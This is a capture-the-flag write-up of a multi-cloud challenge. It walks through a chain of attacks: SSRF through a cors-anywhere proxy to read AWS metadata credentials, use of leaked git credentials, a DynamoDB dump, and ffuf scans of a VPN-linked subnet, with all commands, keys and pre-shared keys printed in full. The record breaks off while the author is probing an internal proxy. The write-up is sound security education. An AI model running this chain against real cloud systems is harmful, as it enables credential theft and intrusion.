Here’s my write-up on yet another cloud challenge with no solves titled Keep The Clouds Together... in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG).

If you are new to cloud security, do check out my write-up for Share and Deploy the Containers cloud challenge before continuing on.

The attack path for this challenge is much longer and complex than the other cloud challenges in the competition, further highlighting the difficulties in penetration testing of infrastructures involving multiple cloud computing vendors.

Once again, shoutouts to Tan Kee Hock from GovTech’s CSG for putting together this challenge!

Keep the Clouds Together…

Description:
The recent arrest of an agent from COViD revealed that the punggol-digital-lock.com was part of the massive scam campaign targeted towards the citizens! It provided a free document encryption service to the citizens and now the site demands money to decrypt the previously encrypted files! Many citizens fell prey to their scheme and were unable to decrypt their files! We believe that the decryption key is broken up into parts and hidden deep within the system!

Notes - https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt

Introduction

The note at https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt has the following content:

Please get your act together. The site that is supposed load the list of affected individuals is not displaying properly.
index.html is not loading the users as expected.
For your convenience, I have also generated your git credentials. See me.

- COViD

Notice that the note is hosted on an Amazon S3 Bucket in ap-southeast-1 region named punggol-digital-lock-portal. From the note, we can learn there is a index.html object in the punggol-digital-lock-portal S3 bucket and we should be looking for git credentials somewhere.

Let’s navigate to https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/index.html: S3 Bucket /index.html

As what the notes mentioned, the list of affected individuals indeed failed to load.
Let’s take a peek at the JavaScript code included by the webpage:

1
2
3
4
5
6
7
8
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://122.248.230.66/http://127.0.0.1:8080/dump-data", false);
xhttp.send();
var data = (JSON.parse(xhttp.responseText)).data;
for (i = 0; i < data.length; i++) {
    output = "<tr><td>" + (i+1) + "</td><td>" + data[i].name + "</td><td>" + data[i].no_of_files + "</td><td>" + data[i].total_file_size + "</td><td>" + Math.ceil(data[i].cash_bounty) + "</td></tr>";
document.write(output);
}

The page attempts to fetch a JSON containing the list of affected individuals from an IP address 122.248.230.66 belonging to Amazon Elastic Computing (EC2).

cors-anywhere = SSRF to Anywhere

If we navigate to http://122.248.230.66/, we can see the following response:

This API enables cross-origin requests to anywhere.

Usage:

/               Shows help
/iscorsneeded   This is the only resource on this host which is served without CORS headers.
/<url>          Create a request to <url>, and includes CORS headers in the response.

If the protocol is omitted, it defaults to http (https if port 443 is specified).

Cookies are disabled and stripped from requests.

Redirects are automatically followed. For debugging purposes, each followed redirect results
in the addition of a X-CORS-Redirect-n header, where n starts at 1. These headers are not
accessible by the XMLHttpRequest API.
After 5 redirects, redirects are not followed any more. The redirect response is sent back
to the browser, which can choose to follow the redirect (handled automatically by the browser).

The requested URL is available in the X-Request-URL response header.
The final URL, after following all redirects, is available in the X-Final-URL response header.


To prevent the use of the proxy for casual browsing, the API requires either the Origin
or the X-Requested-With header to be set. To avoid unnecessary preflight (OPTIONS) requests,
it's recommended to not manually set these headers in your code.


Demo          :   https://robwu.nl/cors-anywhere.html
Source code   :   https://github.com/Rob--W/cors-anywhere/
Documentation :   https://github.com/Rob--W/cors-anywhere/#documentation

This indicates that the cors-anywhere proxy application is being deployed, allowing us to be able to perform Server-Side Request Forgery (SSRF) attacks. When browsing to http://122.248.230.66/http://127.0.0.1:8080/dump-data, we get the following error message:

Not found because of proxy error: Error: connect ECONNREFUSED 127.0.0.1:8080

This indicates that the port 8080 appears to be inaccessible, hence the list of victims could not be loaded successfully.
Perhaps, the webserver is not even hosted locally!

Since we have identified the IP address 122.248.230.66 is an AWS EC2 instance, we can leverage the SSRF vulnerability to fetch information such as temporary IAM access keys from AWS Instance Metadata service:

$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/
punggol-digital-lock-service
$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/punggol-digital-lock-service
{
  "Code" : "Success",
  "LastUpdated" : "2020-12-09T21:53:30Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4I6UNNJLGGSBLNBE",
  "SecretAccessKey" : "1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7",
  "Token" : "IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==",
  "Expiration" : "2020-12-10T04:13:44Z"
}

Great! We have successfully obtained temporary security credentials for punggol-digital-lock-service assumed role user.
Here’s a quick recap on our progress before we continue on: Initial Entrypoint Progress

Enumerating punggol-digital-lock-service Role

I used WeirdAAL to automate the enumerate the permitted actions for the assumed role user user and AWS CLI v1.

$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA4I6UNNJLGGSBLNBE
aws_secret_access_key = 1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7
aws_session_token = IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==

$ aws sts get-caller-identity
{
    "UserId": "AROA4I6UNNJLJABU4K2VW:i-0da9e688ab9264a5e",
    "Account": "843869678166",
    "Arn": "arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e"
}

$ cp ~/.aws/credentials .env

$ python3 weirdAAL.py -m recon_all -t punggol-digital-lock-service
...

$ python3 weirdAAL.py -m list_services_by_key -t punggol-digital-lock-service
[+] Services enumerated for ASIA4I6UNNJLIWT435IG [+]
codecommit.ListRepositories
dynamodb.ListTables
ec2.DescribeRouteTables
ec2.DescribeVpnConnections
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
s3.ListBuckets
sts.GetCallerIdentity

We can see a few interesting permitted actions, namely:

  • codecommit.ListRepositories relating to git repositories
  • dynamodb.ListTables relating to NoSQL databases
  • ec2.DescribeRouteTables relating to network routing tables of the Virtual Private Cloud (VPC)
  • ec2.DescribeVpnConnections relating to VPN tunnels
  • s3.ListBuckets relating to S3 buckets

Since we started the challenge from a note residing in an Amazon S3 bucket, let’s proceed to enumerate that first.

Getting git Credentials

First, we try to list all S3 buckets:

$ aws s3 ls
2020-11-21 18:36:15 punggol-digital-lock-portal

Seems like there’s only one bucket. Let’s list the objects in the S3 bucket:

$ aws s3 ls s3://punggol-digital-lock-portal/
2020-11-21 19:22:44       2513 index.html
2020-11-21 19:22:44        253 notes-to-covid-developers.txt
2020-11-21 20:37:57        274 some-credentials-for-you-lazy-bums.txt

There is a hidden file some-credentials-for-you-lazy-bums.txt in the punggol-digital-lock-portal S3 bucket!
Let’s fetch the hidden file:

$ aws s3 cp s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt .
download: s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt to ./some-credentials-for-you-lazy-bums.txt

The file some-credentials-for-you-lazy-bums.txt contains the following content:

covid-developer-at-843869678166
TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=

Use these credentials that I have provisioned for you! The other internal web application is still under development.
The other network engineers are busy getting our networks connected.

Great! We obtained git credentials successfully. I wonder where we can use them… :thinking:

git Those Repositories

That’s right! We can use it to access git repositories hosted on AWS CodeCommit source control service.

Let’s first list all AWS CodeCommit repositories:

$ aws codecommit list-repositories
{
    "repositories": [
        {
            "repositoryName": "punggol-digital-lock-api",
            "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105"
        },
        {
            "repositoryName": "punggol-digital-lock-cors-server",
            "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e"
        }
    ]
}

Two code repositories are found. Let’s get more details of the respective repositories:

$ aws codecommit get-repository --repository-name punggol-digital-lock-api
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105",
        "repositoryName": "punggol-digital-lock-api",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985979.053,
        "creationDate": 1605985614.824,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-api"
    }
}

$ aws codecommit get-repository --repository-name punggol-digital-lock-cors-server
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e",
        "repositoryName": "punggol-digital-lock-cors-server",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985991.35,
        "creationDate": 1605985592.865,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-cors-server"
    }
}

Grab the two git clone URLs and fetch the two code repositories:

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server
Cloning into 'punggol-digital-lock-cors-server'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://[email protected]azonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 8, done.
Unpacking objects: 100% (8/8), done.

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api
Cloning into 'punggol-digital-lock-api'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://[email protected]azonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 7, done.
Unpacking objects: 100% (7/7), done.

Awesome! We now have both code repositories.

At this point, the punggol-digital-lock-api repository definitely sounds more interesting since we know that punggol-digital-lock-cors-server is likely to be the cors-anywhere proxy application, so let’s look at the punggol-digital-lock-api repository first.

Getting to the Database

In the punggol-digital-lock-api repository, there is a Node.js application.

The source code of index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
var express = require('express')
var app = express()
var cors = require('cors');
var AWS = require("aws-sdk");
var corsOptions = {
    origin: 'http://punggol-digital-lock.internal',
    optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204
}
AWS.config.loadFromPath('./node_config.json');
var ddb = new AWS.DynamoDB({ apiVersion: '2012-08-10' });
let dataStore = [];

const download_data = () => {
    return new Promise((resolve, reject) => {
        try {
            var params = {
                ExpressionAttributeValues: {
                    ':id': { N: '101' }
                },
                FilterExpression: 'id < :id',
                TableName: 'citizens'
            };
            ddb.scan(params, function (err, data) {
                if (err) {
                    console.log("Error", err);
                    return reject(null);
                } else {
                    results = []
                    data.Items.forEach(function (element, index, array) {
                        results.push({
                            'no_of_files': element.no_of_files.N,
                            'cash_bounty': element.cash_bounty.N,
                            'id': element.id.N,
                            'name': element.name.S,
                            'total_file_size': element.total_file_size.N
                        });
                    });
                    return resolve(results);
                }
            });
        } catch (err) {
            console.error(err);
        }
    });

}

async function boostrap() {
    dataStore = await download_data();
}

boostrap();

app.get('/dump-data', cors(corsOptions), function (req, res, next) {
    res.json({ data: dataStore });
})
app.listen(8080, function () {
    console.log('punggol-digital-lock-api server running on port 8080')
})

We can observe that there is an internal hostname punggol-digital-lock.internal and that the application fetches the list of victim users from an Amazon DynamoDB NoSQL database. Taking a closer look at the code, we can also see that the table name is citizens and that the code executes ddb.scan() to fetch records with id < 101.

Scanning the Flag from DynamoDB

Let’s try to enumerate the Amazon DynamoDB NoSQL database further.

$ aws dynamodb list-tables
{
    "TableNames": [
        "citizens"
    ]
}

Looks like there’s only one table citizens in the DynamoDB. Let’s try to query it and fetch all records except id = 0:

$ aws dynamodb query --table-name "citizens" --key-condition-expression 'id > :id' --expression-attribute-values '{":id":{"N":"0"}}'

An error occurred (AccessDeniedException) when calling the Query operation: User: arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e is not authorized to perform: dynamodb:Query on resource: arn:aws:dynamodb:ap-southeast-1:843869678166:table/citizens

Unfortunately, we don’t have the permission to do so. Instead of performing the query operation, let’s try using the scan operation to dump the table contents instead:

$ aws dynamodb scan --table-name citizens | wc -l
1724

That worked! That’s quite a bit of data to sieve through, so let’s grep for the flag in the JSON output:

$ aws dynamodb scan --table-name citizens | grep -A 5 -B 11 govtech
{
    "no_of_files": {
        "N": "0"
    },
    "cash_bounty": {
        "N": "0"
    },
    "id": {
        "N": "10000"
    },
    "name": {
        "S": "govtech-csg{Mult1_Cl0uD_"
    },
    "total_file_size": {
        "N": "0"
    }
},

And we successfully get the first half of the flag: govtech-csg{Mult1_Cl0uD_ :smile:
Before we continue to find the second half of the flag, let’s take a quick look at our progress at the moment:

Midpoint of Attack Path

VPN Subnet Routing

Now what? We still have not looked at the punggol-digital-lock-cors-server code repository yet.

As expected, there is an Node.js application basically creating a cors-anywhere proxy at index.js:

1
2
3
4
5
6
7
8
9
10
11
12
// Listen on a specific host via the HOST environment variable
var host = '0.0.0.0';
// Listen on a specific port via the PORT environment variable
var port = 80;
var cors_proxy = require('cors-anywhere');
cors_proxy.createServer({
    originWhitelist: [], // Allow all origins
    setHeaders: {'x-requested-with': 'cors-server'},
    removeHeaders: ['cookie']
}).listen(port, host, function() {
    console.log('cors-server running on ' + host + ':' + port);
});

More importantly, there’s a note.txt:

Allow requests to be proxied to reach internal networks. Current network has routing enabled to the other VPN subnets.

That’s interesting. If the current network has routing to the other VPN subnets, perhaps we can access hosts on the other network too!
Which reminds me, we haven’t checked out the output for the permitted actions – ec2.DescribeRouteTables and ec2.DescribeVpnConnections – just yet, so let’s do that now:

$ aws ec2 describe-vpn-connections
{
    "VpnConnections": [
        {
            "CustomerGatewayConfiguration": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<vpn_connection id=\"vpn-071d320b1122f4c0e\">\n  <customer_gateway_id>cgw-025dc69154fd5cf91</customer_gateway_id>\n  <vpn_gateway_id>vgw-03a9749df3e682e4b</vpn_gateway_id>\n  <vpn_connection_type>ipsec.1</vpn_connection_type>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.118</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.23.247</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.117</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>lROuGqp0zYsQ5PjyJNHlKTFQPz0apIn4</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.238</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.251.166</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.237</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>.BFZUutUl7Y3jA91vU9K6te5y_Q_VM7f</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n</vpn_connection>",
            "CustomerGatewayId": "cgw-025dc69154fd5cf91",
            "Category": "VPN",
            "State": "available",
            "Type": "ipsec.1",
            "VpnConnectionId": "vpn-071d320b1122f4c0e",
            "VpnGatewayId": "vgw-03a9749df3e682e4b",
            "Options": {
                "EnableAcceleration": false,
                "StaticRoutesOnly": false,
                "LocalIpv4NetworkCidr": "0.0.0.0/0",
                "RemoteIpv4NetworkCidr": "0.0.0.0/0",
                "TunnelInsideIpVersion": "ipv4"
            },
            "Routes": [],
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "aws-vpn-connection1"
                }
            ],
            "VgwTelemetry": [
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T13:21:11.000Z",
                    "OutsideIpAddress": "54.254.23.247",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                },
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T16:20:56.000Z",
                    "OutsideIpAddress": "54.254.251.166",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                }
            ]
        }
    ]
}

Whoa! That’s a lot of information.

Essentially, the Amazon EC2 instance has a Site-to-site IPSec VPN tunnel between 54.254.23.247 (Amazon) and 34.87.151.253 (Google Cloud). This creates a persistent connection between the two Virtual Private Cloud (VPC) networks, allowing accessing of network resources in a Google Cloud VPC network from an Amazon VPC network and vice versa.

Let’s also view the network routes configured for the Amazon VPC:

$ aws ec2 describe-route-tables
{
    "RouteTables": [
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-f9acc780",
                    "RouteTableId": "rtb-f8d8a19e",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [],
            "RouteTableId": "rtb-f8d8a19e",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.31.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-e15b4f85",
                    "Origin": "CreateRoute",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-66699c00",
            "OwnerId": "843869678166"
        },
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-04c8bf104c051f5a3",
                    "RouteTableId": "rtb-0723142a5801fe538",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [
                {
                    "GatewayId": "vgw-03a9749df3e682e4b"
                }
            ],
            "RouteTableId": "rtb-0723142a5801fe538",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.16.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-0ce84b9afa6a16a08",
                    "Origin": "CreateRoute",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "10.240.0.0/24",
                    "GatewayId": "vgw-03a9749df3e682e4b",
                    "Origin": "EnableVgwRoutePropagation",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-09e10b8144ebddec2",
            "OwnerId": "843869678166"
        }
    ]
}

Notice that the subnet 10.240.0.0/24 is allocated for gateway ID vgw-03a9749df3e682e4b, which is also the VpnGatewayId found in the VPN connection details. Since the two networks are connected together by the VPN tunnel, we can try to connect to hosts in the VPN network.

To do so, we can leverage the SSRF in the punggol-digital-lock-cors-server application and brute-force against the 10.240.0.0/24 subnet to identify hosts that are alive on the network.

Note: Valid hosts in the 10.240.0.0/24 ranges from 10.240.0.1 to 10.240.0.254, so we only need to bruteforce 254 network hosts.

If a network host is unreachable via SSRF, the response will be extremely delayed. Hence, we can set a timeout of 1 second when performing our brute-force to reduce the scanning time needed.

I used ffuf to fuzz the last octet of the IP address:

$ seq 1 254 > octet
$ ffuf -u http://122.248.230.66/http://10.240.0.FUZZ/ -w octet -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.FUZZ:8080/
 :: Wordlist         : FUZZ: octet
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

100                     [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [254/254] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 253 ::

We found an alive network host 10.240.0.100!

Now, we can also enumerate all TCP ports and try to discover any HTTP/HTTPS services that we can interact with:

$ seq 1 65535 > ports
$ ffuf -u http://122.248.230.66/http://10.240.0.100:FUZZ/ -w ports -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.100:FUZZ/
 :: Wordlist         : FUZZ: ports
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

80                      [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [65535/65535] :: Job [1/1] :: 5041 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Doh! There’s a HTTP webserver running on port 80 on the host all along!

Exploiting SSRF-as-a-Service (“SaaS”) Application

Internal Web Proxy

Great! We discovered yet another proxy application.

Even if we did not realise that this network host is actually within a Google VPC from earlier, we can still realise that pretty quickly in this next step.

Using the proxy, we try to enter http://localhost for the site and see if the response for http://localhost returns the Internal Web Proxy:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    Failed to parse address "localhost" (error number 0) 
    </body>
</html>

Seems like there’s some parsing errors in the URL supplied. Maybe it requires a port number to be explicitly specified?

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    <br><hr><br>HTTP/1.1 400 Bad Request
Date: Thu, 10 Dec 2020 05:53:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 366
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at gcp-vm-asia-southeast1.asia-southeast1-a.c.stack-the-flags-296309.internal Port 80</address>
</body></html>
    </body>
</html>

